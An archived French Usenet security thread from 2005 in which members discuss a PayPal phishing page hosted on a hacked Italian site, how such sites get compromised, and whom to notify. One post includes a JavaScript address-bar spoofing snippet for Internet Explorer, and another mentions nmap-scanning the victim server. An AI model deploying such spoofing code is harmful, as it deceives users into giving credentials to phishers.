j'ai recu un faux email de paypal qui me dirige sur un faux site paypal.
Je ne pense pas que tu l'as recu de PayPal, mais plutot de quelqu'un qui se fait passer pour PayPal.
ces pages font parties d'un site italien qui semblent clean
Il ne fait que sembler...
comment font ils pour pirater une page de ce site
Il n'y a besoin de l'avis de personne pour ecrire un fichier HTML. Le fait que le rendu ressemble à celui de paypal n'est pas contestable (saufs logos, marques, ...).
Le probleme est qu'ils se font passer pour PayPal.
et sont ils intouchables??
Ils ne sont pas forcement intouchables, cela depend grosso-modo de l'hebergeur du site web. Si il est serieux, ca se passera bien.
L'envoi de cet email est fait avec les memes methodes que le Spam, cad qu'il n'y a pas de ciblage (j'en recois aussi pourtant je n'ai pas de compte PayPal...)
ps: j'ai prevenu paypal de ce phishing
Ils feront probablement ce qu'il faut. (j'ose esperer qu'ils sont serieux)
Hello
j'ai recu un faux email de paypal qui me dirige sur un faux site
paypal.
Je ne pense pas que tu l'as recu de PayPal, mais plutot de quelqu'un qui
se fait passer pour PayPal.
ces pages font parties d'un site italien qui semblent clean
Il ne fait que sembler...
comment font ils pour pirater une page de ce site
Il n'y a besoin de l'avis de personne pour ecrire un fichier HTML. Le
fait que le rendu ressemble à celui de paypal n'est pas contestable
(saufs logos, marques, ...).
Le probleme est qu'ils se font passer pour PayPal.
et sont ils intouchables??
Ils ne sont pas forcement intouchables, cela depend grosso-modo de
l'hebergeur du site web. Si il est serieux, ca se passera bien.
L'envoi de cet email est fait avec les memes methodes que le Spam, cad
qu'il n'y a pas de ciblage (j'en recois aussi pourtant je n'ai pas de
compte PayPal...)
ps: j'ai prevenu paypal de ce phishing
Ils feront probablement ce qu'il faut. (j'ose esperer qu'ils sont serieux)
j'ai recu un faux email de paypal qui me dirige sur un faux site paypal.
Je ne pense pas que tu l'as recu de PayPal, mais plutot de quelqu'un qui se fait passer pour PayPal.
ces pages font parties d'un site italien qui semblent clean
Il ne fait que sembler...
comment font ils pour pirater une page de ce site
Il n'y a besoin de l'avis de personne pour ecrire un fichier HTML. Le fait que le rendu ressemble à celui de paypal n'est pas contestable (saufs logos, marques, ...).
Le probleme est qu'ils se font passer pour PayPal.
et sont ils intouchables??
Ils ne sont pas forcement intouchables, cela depend grosso-modo de l'hebergeur du site web. Si il est serieux, ca se passera bien.
L'envoi de cet email est fait avec les memes methodes que le Spam, cad qu'il n'y a pas de ciblage (j'en recois aussi pourtant je n'ai pas de compte PayPal...)
ps: j'ai prevenu paypal de ce phishing
Ils feront probablement ce qu'il faut. (j'ose esperer qu'ils sont serieux)
Emmanuel Florac
Le Sun, 10 Apr 2005 13:14:04 +0000, trex a écrit :
comment font ils pour pirater une page de ce site et sont ils intouchables??
Ils ont probablement exploité une faille de sécurité du serveur pour s'y installer "comme à la maison". D'un seul coup on s'aperçoit que les petits pirates qui font du "defacement" pour s'amuser sont bien gentils et innofensifs... Il est probable d'ailleurs que ce genre de piraterie organisée soit liée aux réseaux mafieux traditionnels, bref pas du tout de gentils garçons.
ps: j'ai prevenu paypal de ce phishing
Et préviens surtout le webmaster du site principal qu'il s'est fait gravissimement compromettre!
-- Si ça a l'air facile, c'est difficile. Si ça a l'air difficile, c'est carrément impossible. Si ça a l'air impossible, c'est un compilateur Ada. Théorème de Stockmayer.
Le Sun, 10 Apr 2005 13:14:04 +0000, trex a écrit :
comment font ils pour pirater une page de ce site et sont ils
intouchables??
Ils ont probablement exploité une faille de sécurité du serveur pour
s'y installer "comme à la maison". D'un seul coup on s'aperçoit que les
petits pirates qui font du "defacement" pour s'amuser sont bien gentils et
innofensifs...
Il est probable d'ailleurs que ce genre de piraterie organisée soit liée
aux réseaux mafieux traditionnels, bref pas du tout de gentils garçons.
ps: j'ai prevenu paypal de ce phishing
Et préviens surtout le webmaster du site principal qu'il s'est fait
gravissimement compromettre!
--
Si ça a l'air facile, c'est difficile. Si ça a l'air difficile, c'est
carrément impossible. Si ça a l'air impossible, c'est un compilateur
Ada.
Théorème de Stockmayer.
Le Sun, 10 Apr 2005 13:14:04 +0000, trex a écrit :
comment font ils pour pirater une page de ce site et sont ils intouchables??
Ils ont probablement exploité une faille de sécurité du serveur pour s'y installer "comme à la maison". D'un seul coup on s'aperçoit que les petits pirates qui font du "defacement" pour s'amuser sont bien gentils et innofensifs... Il est probable d'ailleurs que ce genre de piraterie organisée soit liée aux réseaux mafieux traditionnels, bref pas du tout de gentils garçons.
ps: j'ai prevenu paypal de ce phishing
Et préviens surtout le webmaster du site principal qu'il s'est fait gravissimement compromettre!
-- Si ça a l'air facile, c'est difficile. Si ça a l'air difficile, c'est carrément impossible. Si ça a l'air impossible, c'est un compilateur Ada. Théorème de Stockmayer.
Eric Demeester
dans (in) fr.comp.securite, trex ecrivait (wrote) :
Bonsoir,
j'ai recu un faux email de paypal qui me dirige sur un faux site paypal. voici le lien : http://www.dwitalia.it/.pay/
comment font ils pour pirater une page de ce site et sont ils intouchables??
Pour pirater un site, il suffit de s'y incruster en utilisant une faille pour y injecter ses propres pages. Les scripts PHP écrits avec les pieds permettent de le faire très facilement, surtout s'ils utilisent des bidules genre phpBB qui sont des mines en la matière, et à vue de nez, vu l'URL que tu cites, c'est probablement comme ça que la page en question s'est incrustée à l'insu du plein gré du propriétaire du site.
ps: j'ai prevenu paypal de ce phishing
C'est bien, mais comme le dit Emmanuel Florac, le plus urgent est de contacter l'administrateur du site piraté pour qu'il prenne les mesures nécessaires.
-- Eric Demeester - http://www.galacsys.net
dans (in) fr.comp.securite, trex <trex@free.fr> ecrivait (wrote) :
Bonsoir,
j'ai recu un faux email de paypal qui me dirige sur un faux site
paypal.
voici le lien : http://www.dwitalia.it/.pay/
comment font ils pour pirater une page de ce site et sont ils
intouchables??
Pour pirater un site, il suffit de s'y incruster en utilisant une faille
pour y injecter ses propres pages. Les scripts PHP écrits avec les pieds
permettent de le faire très facilement, surtout s'ils utilisent des
bidules genre phpBB qui sont des mines en la matière, et à vue de nez,
vu l'URL que tu cites, c'est probablement comme ça que la page en
question s'est incrustée à l'insu du plein gré du propriétaire du site.
ps: j'ai prevenu paypal de ce phishing
C'est bien, mais comme le dit Emmanuel Florac, le plus urgent est de
contacter l'administrateur du site piraté pour qu'il prenne les mesures
nécessaires.
dans (in) fr.comp.securite, trex ecrivait (wrote) :
Bonsoir,
j'ai recu un faux email de paypal qui me dirige sur un faux site paypal. voici le lien : http://www.dwitalia.it/.pay/
comment font ils pour pirater une page de ce site et sont ils intouchables??
Pour pirater un site, il suffit de s'y incruster en utilisant une faille pour y injecter ses propres pages. Les scripts PHP écrits avec les pieds permettent de le faire très facilement, surtout s'ils utilisent des bidules genre phpBB qui sont des mines en la matière, et à vue de nez, vu l'URL que tu cites, c'est probablement comme ça que la page en question s'est incrustée à l'insu du plein gré du propriétaire du site.
ps: j'ai prevenu paypal de ce phishing
C'est bien, mais comme le dit Emmanuel Florac, le plus urgent est de contacter l'administrateur du site piraté pour qu'il prenne les mesures nécessaires.
-- Eric Demeester - http://www.galacsys.net
Emmanuel Florac
Le Sun, 10 Apr 2005 18:36:38 +0000, Eric Demeester a écrit :
c'est probablement comme ça que la page en question s'est incrustée à l'insu du plein gré du propriétaire du site.
J'ai scanné avec nmap le site en question. Le serveur apparemment est un linux antédiluvien (noyau 2.2) avec des tonnes de services accessibles depuis le net, finger, ftp, ssh et compagnie... Bref un vrai bonheur pour des pirates :(
-- Quis, quid, ubi, quibus auxiliis, cur, quomodo, quando
Le Sun, 10 Apr 2005 18:36:38 +0000, Eric Demeester a écrit :
c'est probablement comme ça que la page en
question s'est incrustée à l'insu du plein gré du propriétaire du
site.
J'ai scanné avec nmap le site en question. Le serveur apparemment est un
linux antédiluvien (noyau 2.2) avec des tonnes de services accessibles
depuis le net, finger, ftp, ssh et compagnie... Bref un vrai bonheur pour
des pirates :(
--
Quis, quid, ubi, quibus auxiliis, cur, quomodo, quando
Le Sun, 10 Apr 2005 18:36:38 +0000, Eric Demeester a écrit :
c'est probablement comme ça que la page en question s'est incrustée à l'insu du plein gré du propriétaire du site.
J'ai scanné avec nmap le site en question. Le serveur apparemment est un linux antédiluvien (noyau 2.2) avec des tonnes de services accessibles depuis le net, finger, ftp, ssh et compagnie... Bref un vrai bonheur pour des pirates :(
-- Quis, quid, ubi, quibus auxiliis, cur, quomodo, quando
Fabien LE LEZ
On 10 Apr 2005 14:59:04 GMT, Emmanuel Florac :
Et préviens surtout le webmaster du site principal
Mouais... bof. Prévenir directement l'intéressé qu'il y a un problème de sécurité dans son système me paraît dangereux. Cf toutes les discussions à ce sujet ici même. D'ailleurs, si l'OP a été sur une page frauduleuse (le lien qu'il cite), n'est-il pas lui-même considéré comme pirate ? Donc, mon conseil : la boucler et laisser Paypal contacter le webmaster.
-- ;-)
On 10 Apr 2005 14:59:04 GMT, Emmanuel Florac <eflorac@imaginet.fr>:
Et préviens surtout le webmaster du site principal
Mouais... bof. Prévenir directement l'intéressé qu'il y a un problème
de sécurité dans son système me paraît dangereux. Cf toutes les
discussions à ce sujet ici même.
D'ailleurs, si l'OP a été sur une page frauduleuse (le lien qu'il
cite), n'est-il pas lui-même considéré comme pirate ?
Donc, mon conseil : la boucler et laisser Paypal contacter le
webmaster.
Et préviens surtout le webmaster du site principal
Mouais... bof. Prévenir directement l'intéressé qu'il y a un problème de sécurité dans son système me paraît dangereux. Cf toutes les discussions à ce sujet ici même. D'ailleurs, si l'OP a été sur une page frauduleuse (le lien qu'il cite), n'est-il pas lui-même considéré comme pirate ? Donc, mon conseil : la boucler et laisser Paypal contacter le webmaster.
-- ;-)
david.martin
c'est probablement comme ça que la page en question s'est incrustée à l'insu du plein gré du propriétaire du site.
J'ai scanné avec nmap le site en question. Le serveur apparemment est un linux antédiluvien (noyau 2.2) avec des tonnes de services accessibles depuis le net, finger, ftp, ssh et compagnie... Bref un vrai bonheur pour des pirates :(
Bonjour,
Effectivement sous Internet explorer sa marche, mais pas avec Firefox !!! Une raison de plus pour passer à Firefox.
En fait il s'agit d'un simple trucage, on a caché la vraie adresse par une autre. Pour voir le trucage, lancer IE avec http://www.dwitalia.it/.pay/, puis calculatrice (par exemple), et deplace calculatrice de facon a ce que calcultrice recouvre l'adresse, et la tu verra, comme un effet d'etiquette coller.
Si tu veux t'amuser il suffit de recopier le code qui fait sa entre les balises HEAD , rien de bien mechant : On creer une petit rectangle redimensionnable sur lequel on a un petit texte !
<script language="" type="text/javascript"> var vuln_x, vuln_y, vuln_w, vuln_h; function vuln_calc() { var root= document[ (document.compatMode=='CSS1Compat') ? 'documentElement' : 'body' ]; vuln_x= window.screenLeft+70; vuln_y= window.screenTop-21; vuln_w= root.offsetWidth-200; vuln_h= 17; vuln_show(); }
var vuln_win; function vuln_pop() { vuln_win= window.createPopup(); vuln_win.document.body.innerHTML= vuln_html; vuln_win.document.body.style.margin= 0; vuln_win.document.body.onunload= vuln_pop; vuln_show(); }
function vuln_show() { if (vuln_win) vuln_win.show(vuln_x, vuln_y, vuln_w, vuln_h); }
var vuln_html= 'x3Cdiv style="height: 100%; line-height: 17px; font-family: 'Tahoma', sans-serif; font-size: 8pt;">Dites NON au Referundum'
c'est probablement comme ça que la page en
question s'est incrustée à l'insu du plein gré du propriétaire du
site.
J'ai scanné avec nmap le site en question. Le serveur apparemment est un
linux antédiluvien (noyau 2.2) avec des tonnes de services accessibles
depuis le net, finger, ftp, ssh et compagnie... Bref un vrai bonheur pour
des pirates :(
Bonjour,
Effectivement sous Internet explorer sa marche, mais pas avec Firefox !!!
Une raison de plus pour passer à Firefox.
En fait il s'agit d'un simple trucage, on a caché la vraie adresse par une
autre.
Pour voir le trucage, lancer IE avec http://www.dwitalia.it/.pay/, puis
calculatrice (par exemple), et deplace calculatrice de facon a ce que
calcultrice recouvre l'adresse, et la tu verra, comme un effet d'etiquette
coller.
Si tu veux t'amuser il suffit de recopier le code qui fait sa entre les
balises HEAD , rien de bien mechant :
On creer une petit rectangle redimensionnable sur lequel on a un petit texte
!
<script language="" type="text/javascript">
var vuln_x, vuln_y, vuln_w, vuln_h;
function vuln_calc() {
var root= document[
(document.compatMode=='CSS1Compat') ?
'documentElement' : 'body'
];
vuln_x= window.screenLeft+70;
vuln_y= window.screenTop-21;
vuln_w= root.offsetWidth-200;
vuln_h= 17;
vuln_show();
}
var vuln_win;
function vuln_pop() {
vuln_win= window.createPopup();
vuln_win.document.body.innerHTML= vuln_html;
vuln_win.document.body.style.margin= 0;
vuln_win.document.body.onunload= vuln_pop;
vuln_show();
}
function vuln_show() {
if (vuln_win)
vuln_win.show(vuln_x, vuln_y, vuln_w, vuln_h);
}
var vuln_html= 'x3Cdiv style="height: 100%; line-height: 17px; font-family:
'Tahoma', sans-serif; font-size: 8pt;">Dites NON au Referundum'
c'est probablement comme ça que la page en question s'est incrustée à l'insu du plein gré du propriétaire du site.
J'ai scanné avec nmap le site en question. Le serveur apparemment est un linux antédiluvien (noyau 2.2) avec des tonnes de services accessibles depuis le net, finger, ftp, ssh et compagnie... Bref un vrai bonheur pour des pirates :(
Bonjour,
Effectivement sous Internet explorer sa marche, mais pas avec Firefox !!! Une raison de plus pour passer à Firefox.
En fait il s'agit d'un simple trucage, on a caché la vraie adresse par une autre. Pour voir le trucage, lancer IE avec http://www.dwitalia.it/.pay/, puis calculatrice (par exemple), et deplace calculatrice de facon a ce que calcultrice recouvre l'adresse, et la tu verra, comme un effet d'etiquette coller.
Si tu veux t'amuser il suffit de recopier le code qui fait sa entre les balises HEAD , rien de bien mechant : On creer une petit rectangle redimensionnable sur lequel on a un petit texte !
<script language="" type="text/javascript"> var vuln_x, vuln_y, vuln_w, vuln_h; function vuln_calc() { var root= document[ (document.compatMode=='CSS1Compat') ? 'documentElement' : 'body' ]; vuln_x= window.screenLeft+70; vuln_y= window.screenTop-21; vuln_w= root.offsetWidth-200; vuln_h= 17; vuln_show(); }
var vuln_win; function vuln_pop() { vuln_win= window.createPopup(); vuln_win.document.body.innerHTML= vuln_html; vuln_win.document.body.style.margin= 0; vuln_win.document.body.onunload= vuln_pop; vuln_show(); }
function vuln_show() { if (vuln_win) vuln_win.show(vuln_x, vuln_y, vuln_w, vuln_h); }
var vuln_html= 'x3Cdiv style="height: 100%; line-height: 17px; font-family: 'Tahoma', sans-serif; font-size: 8pt;">Dites NON au Referundum'
Ils feront probablement ce qu'il faut. (j'ose esperer qu'ils sont serieux)
Je les ai prevenus a plusieurs reprises: silence radio, pas meme un ACK :-( Je n'utiliserai pas Paypal tant que je n'ai pas de reponse de leur part.
-- Frédéric
Jacques Caron
Salut,
On 11 Apr 2005 06:44:19 GMT, Fred wrote:
Je les ai prevenus a plusieurs reprises: silence radio, pas meme un ACK :-( Je n'utiliserai pas Paypal tant que je n'ai pas de reponse de leur part.
L'adresse pour prévenir de ce genre de choses est Il suffit de leur envoyer le mail complet tel qu'il a été reçu (avec les en-têtes de préférence). On reçoit généralement assez rapidement un accusé de réception (relativement standard voire automatisé, d'ailleurs).
Jacques. -- Interactive Media Factory Création, développement et hébergement de services interactifs: SMS, SMS+, Audiotel... http://www.imfeurope.com/
Salut,
On 11 Apr 2005 06:44:19 GMT, Fred <fred@somewhere.com> wrote:
Je les ai prevenus a plusieurs reprises: silence radio, pas meme un ACK
:-( Je n'utiliserai pas Paypal tant que je n'ai pas de reponse de leur
part.
L'adresse pour prévenir de ce genre de choses est spoof@paypal.com. Il
suffit de leur envoyer le mail complet tel qu'il a été reçu (avec les
en-têtes de préférence). On reçoit généralement assez rapidement un accusé
de réception (relativement standard voire automatisé, d'ailleurs).
Jacques.
--
Interactive Media Factory
Création, développement et hébergement
de services interactifs: SMS, SMS+, Audiotel...
http://www.imfeurope.com/
Je les ai prevenus a plusieurs reprises: silence radio, pas meme un ACK :-( Je n'utiliserai pas Paypal tant que je n'ai pas de reponse de leur part.
L'adresse pour prévenir de ce genre de choses est Il suffit de leur envoyer le mail complet tel qu'il a été reçu (avec les en-têtes de préférence). On reçoit généralement assez rapidement un accusé de réception (relativement standard voire automatisé, d'ailleurs).
Jacques. -- Interactive Media Factory Création, développement et hébergement de services interactifs: SMS, SMS+, Audiotel... http://www.imfeurope.com/
christophe
Je les ai prevenus a plusieurs reprises: silence radio, pas meme un ACK :-( Je n'utiliserai pas Paypal tant que je n'ai pas de reponse de leur part.
je les ai eu au tel, ils m'ont dit qu'ils y avaient de millions de sites comme ca, sous entendu qu'ils ne donneront sans doute pas suite....
Je les ai prevenus a plusieurs reprises: silence radio, pas meme un ACK
:-( Je n'utiliserai pas Paypal tant que je n'ai pas de reponse de leur part.
je les ai eu au tel, ils m'ont dit qu'ils y avaient de millions de
sites comme ca, sous entendu qu'ils ne donneront sans doute pas
suite....
Je les ai prevenus a plusieurs reprises: silence radio, pas meme un ACK :-( Je n'utiliserai pas Paypal tant que je n'ai pas de reponse de leur part.
je les ai eu au tel, ils m'ont dit qu'ils y avaient de millions de sites comme ca, sous entendu qu'ils ne donneront sans doute pas suite....
Txo
Le Mon, 11 Apr 2005 11:16:54 +0000, christophe nous susurrait :
je les ai eu au tel, ils m'ont dit qu'ils y avaient de millions de sites comme ca, sous entendu qu'ils ne donneront sans doute pas suite....
Ça pose vraiment la question de la confiance qu'on peut avoir dans ce genre de site (paypal). Je pense que quand on ne fait pas ce qu'il faut pour que ses clients ne soient victime d'escroqueries en son nom, on ne doit pas consacrer d'efforts et d'argent pour sécuriser ses services.
Peut on après cela utiliser les services de Paypal pour une quelconque transaction financière ?
-- -+- NON Dominique Marin http://txodom.free.fr NON -+- «Ce n'est pas que j'aie vraiment peur de mourir, mais disons que je préfère ne pas être là quand ça arrivera.» -+- Woody Allen -+-
Le Mon, 11 Apr 2005 11:16:54 +0000, christophe nous susurrait :
je les ai eu au tel, ils m'ont dit qu'ils y avaient de millions de
sites comme ca, sous entendu qu'ils ne donneront sans doute pas
suite....
Ça pose vraiment la question de la confiance qu'on peut avoir dans ce
genre de site (paypal). Je pense que quand on ne fait pas ce qu'il faut
pour que ses clients ne soient victime d'escroqueries en son nom, on ne
doit pas consacrer d'efforts et d'argent pour sécuriser ses services.
Peut on après cela utiliser les services de Paypal pour une quelconque
transaction financière ?
--
-+- NON Dominique Marin http://txodom.free.fr NON -+-
«Ce n'est pas que j'aie vraiment peur de mourir,
mais disons que je préfère ne pas être là quand ça arrivera.»
-+- Woody Allen -+-
Le Mon, 11 Apr 2005 11:16:54 +0000, christophe nous susurrait :
je les ai eu au tel, ils m'ont dit qu'ils y avaient de millions de sites comme ca, sous entendu qu'ils ne donneront sans doute pas suite....
Ça pose vraiment la question de la confiance qu'on peut avoir dans ce genre de site (paypal). Je pense que quand on ne fait pas ce qu'il faut pour que ses clients ne soient victime d'escroqueries en son nom, on ne doit pas consacrer d'efforts et d'argent pour sécuriser ses services.
Peut on après cela utiliser les services de Paypal pour une quelconque transaction financière ?
-- -+- NON Dominique Marin http://txodom.free.fr NON -+- «Ce n'est pas que j'aie vraiment peur de mourir, mais disons que je préfère ne pas être là quand ça arrivera.» -+- Woody Allen -+-
